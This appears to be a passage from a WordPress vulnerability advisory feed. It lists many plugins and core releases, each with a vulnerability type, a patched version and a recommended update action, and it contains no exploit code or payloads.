Recommended Action: Update to version 1.0.17, or a newer patched version

Plugin: Icegram Engage – Ultimate WP Popup Builder, Lead Generation, Optins, and CTA

Vulnerability: Cross-Site Scripting
Patched Version: 1.10.29
Recommended Action: Update to version 1.10.29, or a newer patched version

Plugin: Publish to Schedule

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 4.5.5
Recommended Action: Update to version 4.5.5, or a newer patched version

Plugin: wp image slideshow

Vulnerability: Authenticated (Subscriber+) SQL Injection via Shortcode
Patched Version: 12.1
Recommended Action: Update to version 12.1, or a newer patched version

Plugin: Poll | Vote | Contest – Best Poll Plugin for WordPress

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.8.7
Recommended Action: Update to version 4.8.7, or a newer patched version

Plugin: WP EXtra

Vulnerability: Cross-Site Request Forgery via ToolImport
Patched Version: 6.5
Recommended Action: Update to version 6.5, or a newer patched version

Core: WordPress

Vulnerability: Content-Spoofing Attacks
Patched Version: 3.5.2
Recommended Action: Update to version 3.5.2, or a newer patched version

Plugin: Social Media Follow Buttons Bar

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 5.0
Recommended Action: Update to version 5.0, or a newer patched version

Plugin: WP All Import Pro

Vulnerability: SQL Injection
Patched Version: 4.1.2
Recommended Action: Update to version 4.1.2, or a newer patched version

Plugin: User Location and IP

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: PHP Everywhere

Vulnerability: Authenticated (Contributor+) Remote Code Execution via Metabox
Patched Version: 3.0.0
Recommended Action: Update to version 3.0.0, or a newer patched version

Plugin: Debug Log Manager

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.2.2
Recommended Action: Update to version 2.2.2, or a newer patched version

Plugin: Web and WooCommerce Addons for WPBakery Builder

Vulnerability: Missing Authorization Checks
Patched Version: 1.4.4.2
Recommended Action: Update to version 1.4.4.2, or a newer patched version

Plugin: Online Booking & Scheduling Calendar for WordPress by vcita

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 4.3.1
Recommended Action: Update to version 4.3.1, or a newer patched version

Plugin: Popup, Optin Form & Email Newsletters for Mailchimp, HubSpot, AWeber – MailOptin

Vulnerability: Authenticated (Admin+) Cross-Site Scripting
Patched Version: 1.2.54.1
Recommended Action: Update to version 1.2.54.1, or a newer patched version

Plugin: WP SVG Icons

Vulnerability: Authenticated (Admin+) Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: 301 Redirects – Easy Redirect Manager

Vulnerability: Unspecified; affects versions prior to 2.51
Patched Version: 2.51
Recommended Action: Update to version 2.51, or a newer patched version

Plugin: WP-EMail

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.69.1
Recommended Action: Update to version 2.69.1, or a newer patched version

Plugin: Allow svg files

Vulnerability: Authenticated (Admin+) Arbitrary File Upload
Patched Version: 1.1
Recommended Action: Update to version 1.1, or a newer patched version

Plugin: Appointments

Vulnerability: Unauthenticated PHP Object Injection
Patched Version: 2.2.2
Recommended Action: Update to version 2.2.2, or a newer patched version

Plugin: YITH WooCommerce Product Add-Ons

Vulnerability: Missing Authorization
Patched Version: 4.2.1
Recommended Action: Update to version 4.2.1, or a newer patched version

Plugin: MonsterInsights – Google Analytics Dashboard for WordPress (Website Stats Made Easy)

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 5.3.3
Recommended Action: Update to version 5.3.3, or a newer patched version

Plugin: Predictive Search for WooCommerce

Vulnerability: Missing Authorization via multiple AJAX actions
Patched Version: 5.8.1
Recommended Action: Update to version 5.8.1, or a newer patched version

Plugin: Uncanny Toolkit for LearnDash

Vulnerability: Cross-Site Request Forgery to Arbitrary Plugin Install and Activation
Patched Version: 3.6.4.2
Recommended Action: Update to version 3.6.4.2, or a newer patched version

Plugin: Ultimate FAQ Accordion Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.8.30
Recommended Action: Update to version 1.8.30, or a newer patched version

Plugin: Simple File List

Vulnerability: Unauthenticated Arbitrary File Deletion
Patched Version: 6.1.10
Recommended Action: Update to version 6.1.10, or a newer patched version

Plugin: YOP Poll

Vulnerability: Author+ Stored Cross-Site Scripting via Options Module
Patched Version: 6.3.1
Recommended Action: Update to version 6.3.1, or a newer patched version

Plugin: YITH WooCommerce Product Add-Ons

Vulnerability: Authenticated (Shop Manager+) PHP Object Injection
Patched Version: 4.3.1
Recommended Action: Update to version 4.3.1, or a newer patched version

Plugin: Woo Custom Emails

Vulnerability: Missing Authorization to Unauthenticated Settings Change
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: JetBackup – WP Backup, Migrate & Restore

Vulnerability: Arbitrary File Upload
Patched Version: 1.0.3
Recommended Action: Update to version 1.0.3, or a newer patched version

Plugin: Formzu WP

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via id
Patched Version: 1.6.7
Recommended Action: Update to version 1.6.7, or a newer patched version

Plugin: YAWPP (Yet Another WordPress Petition Plugin)

Vulnerability: Authenticated SQL Injection
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: Namaste! LMS

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via ‘accept_other_payment_methods’, ‘other_payment_methods’ Parameters
Patched Version: 2.6
Recommended Action: Update to version 2.6, or a newer patched version

Plugin: Gravitate QA Tracker

Vulnerability: Object Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP MapIt

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.0.0
Recommended Action: Update to version 3.0.0, or a newer patched version

Plugin: Arigato Autoresponder and Newsletter

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 2.7.1.1
Recommended Action: Update to version 2.7.1.1, or a newer patched version

Plugin: Editorial Calendar

Vulnerability: Authenticated (Contributor+) Insecure Direct Object Reference
Patched Version: 3.8.0
Recommended Action: Update to version 3.8.0, or a newer patched version

Plugin: Easy Social Box / Page Plugin

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 4.1.3
Recommended Action: Update to version 4.1.3, or a newer patched version

Plugin: Sitekit

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via ‘sitekit_iframe’ shortcode
Patched Version: 1.4
Recommended Action: Update to version 1.4, or a newer patched version

Plugin: Form Maker by 10Web – Mobile-Friendly Drag & Drop Contact Form Builder

Vulnerability: Missing Authorization in check_score
Patched Version: 1.15.17
Recommended Action: Update to version 1.15.17, or a newer patched version

Plugin: WP Crowdfunding

Vulnerability: Reflected Cross-Site Scripting via postid
Patched Version: 2.1.7
Recommended Action: Update to version 2.1.7, or a newer patched version

Plugin: Spreadshop Plugin

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.6.6
Recommended Action: Update to version 1.6.6, or a newer patched version

Plugin: Tainacan

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 0.20.5
Recommended Action: Update to version 0.20.5, or a newer patched version

Plugin: Easy Forms for Mailchimp

Vulnerability: Code Injection
Patched Version: 6.5.3
Recommended Action: Update to version 6.5.3, or a newer patched version

Plugin: Better Search TMC

Vulnerability: Directory Traversal
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: 3CX Free Live Chat, Calls & WhatsApp

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 6.2.04
Recommended Action: Update to version 6.2.04, or a newer patched version

Plugin: CBX Petition for WordPress

Vulnerability: Unauthenticated SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: eCommerce Product Catalog Plugin for WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.0.70
Recommended Action: Update to version 3.0.70, or a newer patched version

Plugin: Availability Calendar

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: Cancel order request / Return order / Repeat Order / Reorder for WooCommerce

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.3.3
Recommended Action: Update to version 1.3.3, or a newer patched version

Plugin: Welcart e-Commerce

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.8.9
Recommended Action: Update to version 2.8.9, or a newer patched version

Plugin: Authenticator

Vulnerability: Missing Authorization
Patched Version: 1.3.1
Recommended Action: Update to version 1.3.1, or a newer patched version

Plugin: Find and Replace All

Vulnerability: Cross-Site Request Forgery to Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Livefyre Comments 3

Vulnerability: Stored Cross-Site Scripting
Patched Version: 4.1.5
Recommended Action: Update to version 4.1.5, or a newer patched version

Plugin: Delete All Comments Easily

Vulnerability: All Comments Deletion via Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Custom TinyMCE Shortcode Button

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Donations Made Easy – Smart Donations

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Single Post Exporter

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Forms by CaptainForm – Form Builder for WordPress

Vulnerability: Reflected Cross-Site Scripting via REQUEST_URI
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Appointment Booking and Scheduling Calendar Plugin – Webba Booking

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 4.2.22
Recommended Action: Update to version 4.2.22, or a newer patched version

Plugin: Stripe for WooCommerce

Vulnerability: 3.3.9
Patched Version: 3.3.10
Recommended Action: Update to version 3.3.10, or a newer patched version

Plugin: WooCommerce Pre-Orders

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.2
Recommended Action: Update to version 2.0.2, or a newer patched version

Plugin: Click To Tweet

Vulnerability: Missing Authorization
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Auto Affiliate Links

Vulnerability: Authenticated (Subscriber+) Plugin Settings Change
Patched Version: 6.2.1.6
Recommended Action: Update to version 6.2.1.6, or a newer patched version

Plugin: Spam Free WordPress

Vulnerability: IP Protection Bypass
Patched Version: 2.0
Recommended Action: Update to version 2.0, or a newer patched version

Plugin: RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login

Vulnerability: Authenticated Settings and User Data Export
Patched Version: 4.6.0.4
Recommended Action: Update to version 4.6.0.4, or a newer patched version

Plugin: Client Dash

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via settings
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Advanced Image Sitemap

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WordPrezi

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 0.9
Recommended Action: Update to version 0.9, or a newer patched version

Plugin: Login by Auth0

Vulnerability: Stored Cross-Site Scripting
Patched Version: 4.0.0
Recommended Action: Update to version 4.0.0, or a newer patched version

Plugin: Popup Builder – Create highly converting, mobile friendly marketing popups.

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 4.2.2
Recommended Action: Update to version 4.2.2, or a newer patched version

Plugin: ShortPixel Image Optimizer – Optimize Images, Convert WebP & AVIF

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.22.10
Recommended Action: Update to version 4.22.10, or a newer patched version

Plugin: Ultimate Addons for Beaver Builder – Lite

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.5.5
Recommended Action: Update to version 1.5.5, or a newer patched version

Plugin: GiveWP – Donation Plugin and Fundraising Platform

Vulnerability: Authenticated (Admin+) PHP Object Injection
Patched Version: 2.26.0
Recommended Action: Update to version 2.26.0, or a newer patched version

Plugin: HC Custom WP-Admin URL

Vulnerability: Information Exposure
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Bootstrap Shortcodes

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Conditional Checkout Fields & Edit Checkout Fields for WooCommerce

Vulnerability: Missing Authorization
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: FastDup – Fastest WordPress Migration & Duplicator

Vulnerability: Sensitive Information Exposure via Directory Listing
Patched Version: 2.2.0
Recommended Action: Update to version 2.2.0, or a newer patched version

Plugin: Responsive Pricing Table

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via plugin settings
Patched Version: 5.1.8
Recommended Action: Update to version 5.1.8, or a newer patched version

Plugin: Awesome Filterable Portfolio

Vulnerability: Missing Authorization to Plugin Settings Change
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Export Users to CSV

Vulnerability: CSV Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Video Gallery – YouTube Gallery and Vimeo Gallery

Vulnerability: Missing Authorization
Patched Version: 1.7.7
Recommended Action: Update to version 1.7.7, or a newer patched version

Plugin: Carts Guru

Vulnerability: PHP Object Injection
Patched Version: 1.4.6
Recommended Action: Update to version 1.4.6, or a newer patched version

Plugin: AceIDE

Vulnerability: Authenticated (Admin+) Arbitrary File Read
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: SlimStat Analytics

Vulnerability: Unauthenticated Stored Cross-Site Scripting from Visitors
Patched Version: 4.8.1
Recommended Action: Update to version 4.8.1, or a newer patched version

Plugin: MainWP Page Speed Extension

Vulnerability: Missing Authorization to Arbitrary Plugin Activation
Patched Version: 4.0.3
Recommended Action: Update to version 4.0.3, or a newer patched version

Plugin: Kanban Boards for WordPress

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.5.21
Recommended Action: Update to version 2.5.21, or a newer patched version

Plugin: Spam protection, Anti-Spam, FireWall by CleanTalk

Vulnerability: Unauthenticated Blind SQL Injection
Patched Version: 5.153.4
Recommended Action: Update to version 5.153.4, or a newer patched version

Plugin: Nextend Social Login and Register

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.5.6
Recommended Action: Update to version 1.5.6, or a newer patched version

Plugin: Locatoraid Store Locator

Vulnerability: Cross-Site Request Forgery in grab
Patched Version: 3.9.12
Recommended Action: Update to version 3.9.12, or a newer patched version

Plugin: ARMember – Membership Plugin, Content Restriction, Member Levels, User Profile & User signup

Vulnerability: Unauthenticated SQL Injection
Patched Version: 4.0
Recommended Action: Update to version 4.0, or a newer patched version

Plugin: Affiliates Manager

Vulnerability: Cross-Site Scripting
Patched Version: 2.7.8
Recommended Action: Update to version 2.7.8, or a newer patched version

Plugin: EWWW Image Optimizer

Vulnerability: Remote Code Execution
Patched Version: 2.8.5
Recommended Action: Update to version 2.8.5, or a newer patched version

Plugin: Waiting: One-click countdowns

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Simple Matted Thumbnails

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: UpdraftPlus: WP Backup & Migration Plugin

Vulnerability: Cross-Site Scripting
Patched Version: 1.9.6.4
Recommended Action: Update to version 1.9.6.4, or a newer patched version

Plugin: wpForo Forum

Vulnerability: Authenticated (Subscriber+) Local File Include, Server-Side Request Forgery, and PHAR Deserialization via file_get_contents
Patched Version: 2.1.8
Recommended Action: Update to version 2.1.8, or a newer patched version

Plugin: My Calendar – Accessible Event Manager

Vulnerability: Administrator+ Stored Cross-Site Scripting
Patched Version: 3.3.17
Recommended Action: Update to version 3.3.17, or a newer patched version

Plugin: Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress

Vulnerability: Authenticated (Admin+) PHP Object Injection
Patched Version: 4.4.0
Recommended Action: Update to version 4.4.0, or a newer patched version

Plugin: Breeze – WordPress Cache Plugin

Vulnerability: Cross-Site Request Forgery via import_json_settings
Patched Version: 2.0.9
Recommended Action: Update to version 2.0.9, or a newer patched version

Plugin: Appointment Booking Calendar Plugin and Scheduling Plugin – BookingPress

Vulnerability: Unauthenticated Insecure Direct Object Reference
Patched Version: 1.0.31
Recommended Action: Update to version 1.0.31, or a newer patched version

Plugin: Quick Restaurant Reservations

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.5.5
Recommended Action: Update to version 1.5.5, or a newer patched version

Core: WordPress

Vulnerability: Authorization Bypass Allowing Post Meta Updates
Patched Version: 3.7.21
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.21, 3.8.21, 3.9.19, 4.0.18, 4.1.18, 4.2.15, 4.3.11, 4.4.10, 4.5.9, 4.6.6, 4.7.5

Plugin: PhastPress

Vulnerability: Open Redirect
Patched Version: 1.111
Recommended Action: Update to version 1.111, or a newer patched version

Plugin: WordSpew

Vulnerability: SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Email Subscribers by Icegram Express – Affordable, Powerful Email Marketing for WordPress & WooCommerce

Vulnerability: Unauthenticated Subscriber Download
Patched Version: 3.4.8
Recommended Action: Update to version 3.4.8, or a newer patched version

Plugin: Google Forms

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Comments Ratings

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Invite Anyone

Vulnerability: Change of Email Invitation Content
Patched Version: 1.3.15
Recommended Action: Update to version 1.3.15, or a newer patched version

Plugin: Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker

Vulnerability: Excessive Quiz Attempts
Patched Version: 8.1.11
Recommended Action: Update to version 8.1.11, or a newer patched version

Plugin: FluentSMTP – WP SMTP Plugin with Amazon SES, SendGrid, MailGun, Postmark, Google and Any SMTP Provider

Vulnerability: Authenticated (Author+) Stored Cross-Site Scripting via Email Logs
Patched Version: 2.2.3
Recommended Action: Update to version 2.2.3, or a newer patched version

Plugin: Booking Ultra Pro Appointments Booking Calendar Plugin

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.1.7
Recommended Action: Update to version 1.1.7, or a newer patched version

Plugin: API KEY for Google Maps

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: BP Profile Search

Vulnerability: Reflected Cross-Site Scripting via BPS_FORM
Patched Version: 5.6
Recommended Action: Update to version 5.6, or a newer patched version

Plugin: Judge.me Product Reviews for WooCommerce

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.3.21
Recommended Action: Update to version 1.3.21, or a newer patched version

Core: WordPress

Vulnerability: Comment Disclosure
Patched Version: 3.7.34
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.34, 3.8.34, 3.9.32, 4.0.31, 4.1.31, 4.2.28, 4.3.24, 4.4.23, 4.5.22, 4.6.19, 4.7.18, 4.8.14, 4.9.15, 5.0.10, 5.1.6, 5.2.7, 5.3.4, 5.4.2

Plugin: Easy Canadian Sales Taxes Add-On for iThemes Exchange

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: Organizer

Vulnerability: Multiple Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Booking System – Booking Calendar

Vulnerability: Missing Authorization
Patched Version: 2.0.19.3
Recommended Action: Update to version 2.0.19.3, or a newer patched version

Plugin: A WordPress Testimonial Plugin to Showcase Testimonial Slider, Testimonial Grid and More: Solid Testimonials

Vulnerability: Authenticated (Author+) Stored Cross-Site Scripting
Patched Version: 1.9.7
Recommended Action: Update to version 1.9.7, or a newer patched version

Plugin: Privacy Policy Generator, Terms & Conditions Generator WordPress Plugin : WP Legal Pages

Vulnerability: Cross-Site Scripting
Patched Version: 1.1
Recommended Action: Update to version 1.1, or a newer patched version

Plugin: Cryptocurrency Widgets Pack

Vulnerability: Unauthenticated SQL Injection
Patched Version: 2.0
Recommended Action: Update to version 2.0, or a newer patched version

Plugin: Photo Gallery by 10Web – Mobile-Friendly Image Gallery

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 1.8.3
Recommended Action: Update to version 1.8.3, or a newer patched version

Plugin: Prime Mover – Migrate WordPress Website & Backups

Vulnerability: Sensitive Information Exposure via Directory Listing
Patched Version: 1.9.3
Recommended Action: Update to version 1.9.3, or a newer patched version

Plugin: Simple Ads Manager

Vulnerability: SQL Injection
Patched Version: 2.9.5.118
Recommended Action: Update to version 2.9.5.118, or a newer patched version

Plugin: WordPress WP-Advanced-Search

Vulnerability: Remote Code Execution
Patched Version: 3.3.4
Recommended Action: Update to version 3.3.4, or a newer patched version

Plugin: MapSVG – Vector maps, Image maps, Google Maps

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.3.0
Recommended Action: Update to version 3.3.0, or a newer patched version

Plugin: Wicked Folders

Vulnerability: Cross-Site Request Forgery via ajax_clone_folder
Patched Version: 2.18.17
Recommended Action: Update to version 2.18.17, or a newer patched version

Plugin: WP Maintenance Mode & Site Under Construction

Vulnerability: Missing Authorization to Arbitrary Plugin Installation/Activation
Patched Version: 1.8.2
Recommended Action: Update to version 1.8.2, or a newer patched version

Plugin: Wordfence Security – Firewall, Malware Scan, and Login Security

Vulnerability: 6.1.6
Patched Version: 6.1.7
Recommended Action: Update to version 6.1.7, or a newer patched version

Plugin: Animal Captcha

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Multi Rating

Vulnerability: Cross-Site Request Forgery to Arbitrary Ratings Value Change
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Easy PayPal & Stripe Buy Now Button

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: 1.7.3
Recommended Action: Update to version 1.7.3, or a newer patched version

Plugin: Cookie Bar

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.1
Recommended Action: Update to version 2.1, or a newer patched version

Plugin: myCred – Points Management System For Gamification, Ranks, Badges, and Loyalty Rewards Program.

Vulnerability: Missing Authorization
Patched Version: 2.4.3.1
Recommended Action: Update to version 2.4.3.1, or a newer patched version

Plugin: WP Support Plus Responsive Ticket System

Vulnerability: Stored Cross-Site Scripting
Patched Version: 9.1.2
Recommended Action: Update to version 9.1.2, or a newer patched version

Plugin: Ultimate FAQ Accordion Plugin

Vulnerability: Missing Authorization to Arbitrary FAQ Creation
Patched Version: 2.1.2
Recommended Action: Update to version 2.1.2, or a newer patched version

Plugin: Kenta Blocks – Responsive Blocks and block templates library

Vulnerability: Missing Authorization
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: Best Contact Management Software for WordPress

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: RestroPress – Online Food Ordering System

Vulnerability: Cross-Site Request Forgery to Cart Manipulation
Patched Version: 2.8.3
Recommended Action: Update to version 2.8.3, or a newer patched version

Plugin: Advanced XML Reader

Vulnerability: XML External Entity Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: YourMembers

Vulnerability: SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Rank Math SEO – AI SEO Tools to Dominate SEO Rankings

Vulnerability: Redirect Creation via Unprotected REST API Endpoint
Patched Version: 1.0.41
Recommended Action: Update to version 1.0.41, or a newer patched version

Plugin: WPGraphQL

Vulnerability: Administrative User Creation
Patched Version: 0.3.0
Recommended Action: Update to version 0.3.0, or a newer patched version

Plugin: Video Downloader for TikTok

Vulnerability: Server-Side Request Forgery
Patched Version: 1.4
Recommended Action: Update to version 1.4, or a newer patched version

Plugin: TypeSquare Webfonts for ConoHa

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Backend Localization

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0
Recommended Action: Update to version 2.0, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting via Multiple Vectors
Patched Version: 3.5.2
Recommended Action: Update to version 3.5.2, or a newer patched version

Plugin: ThinkIT WP Contact Form

Vulnerability: Cross-Site Scripting
Patched Version: 0.3
Recommended Action: Update to version 0.3, or a newer patched version

Plugin: Featured Comments

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2.5
Recommended Action: Update to version 1.2.5, or a newer patched version

Plugin: MonsterInsights – Google Analytics Dashboard for WordPress (Website Stats Made Easy)

Vulnerability: Missing Authorization
Patched Version: 8.22.0
Recommended Action: Update to version 8.22.0, or a newer patched version

Plugin: WP Captcha

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Simplr Registration Form Plus+

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.3.5
Recommended Action: Update to version 2.3.5, or a newer patched version

Plugin: Simple Iframe

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via block attributes
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: Blog2Social: Social Media Auto Post & Scheduler

Vulnerability: Reflected Cross-Site Scripting via b2s_id Parameter
Patched Version: 5.9.0
Recommended Action: Update to version 5.9.0, or a newer patched version

Plugin: iFlyChat – WordPress Chat

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 4.7.0
Recommended Action: Update to version 4.7.0, or a newer patched version

Plugin: HT Slider For Elementor

Vulnerability: Cross-Site Request Forgery to Arbitrary Plugin Activation
Patched Version: 1.4.0
Recommended Action: Update to version 1.4.0, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Request Forgery to Post Lockage
